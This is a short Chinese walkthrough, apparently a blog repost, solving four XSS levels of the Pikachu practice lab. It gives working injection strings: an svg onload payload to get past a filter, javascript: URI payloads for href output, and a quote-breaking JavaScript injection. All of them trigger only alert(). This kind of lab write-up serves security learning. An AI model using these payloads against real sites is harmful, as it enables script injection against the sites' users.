当前位置: 首页 > news >正文

【Pikachu靶场:XSS系列】xss之过滤,xss之htmlspecialchars,xss之herf输出,xss之js输出通关啦

news 2025/8/13 13:05:39

一、xss之过滤

<svg onload=alert("过关啦")>


二、xss之htmlspecialchars

javascript:alert(123)

原理:输入测试文本为herf的属性值和内容值,所以转换思路直接变为js代码OK了


三、xss之href输出

JavaScript:alert('假客套')

原理:测试一个文本,输入提交之后,成了为了蓝色文本的herf属性值,所以我们把属性值改为js代码就OK了


四、xss之js输出

拼接新的js代码

'; alert('XSS'); //

http://www.lryc.cn/news/477525.html

相关文章:

  • 面向制造和装配的产品设计指南(二):面向装配的设计指南
  • Python中的PDF处理工具:PyPDF2和ReportLab使用指南
  • 【vxe-table】多选筛选项对列表的列进行动态的显示与隐藏
  • 微信小程序uniapp+vue飞机订票航空售票系统
  • 如何取消Outlook中的循环会议
  • Docker-- cgroups资源控制实战
  • 使用Python和Vosk库实现语音识别
  • stm32使用串口的轮询模式,实现数据的收发
  • 105. UE5 GAS RPG 搭建主菜单
  • 基于 JAVASSM(Java + Spring + Spring MVC + MyBatis)框架开发一个医院挂号系统
  • Golang | Leetcode Golang题解之第540题有序数组中的单一元素
  • 影刀RPA实战:嵌入python,如虎添翼
  • es 数据清理delete_by_query
  • 【每日 C/C++ 问题】
  • stm32学习4
  • Midjourney国内直登
  • 【双目视觉标定】——3面结构光相机标定实践(获取相机内参)~未完待续
  • Python常用脚本集锦
  • MacBook 如何设置打开json格式文件的默认程序是vs code
  • 如何在 Spring Boot 中实现多数据源的事务管理?
  • SQL 常用更新操作
  • Android camera2
  • nginx监控指标有哪些
  • 我谈正态分布——正态偏态
  • 如何使用uniswap v2 获取两个代币的交易对池子
  • CSS中常见的两列布局、三列布局、百分比和多行多列布局!
  • GaussDB Ustore存储引擎解读
  • JAVA基础:数组 (习题笔记)
  • VMWARE ESXI VMFS阵列故障 服务器数据恢复
  • 实时金融股票数据API接口websocket接入方法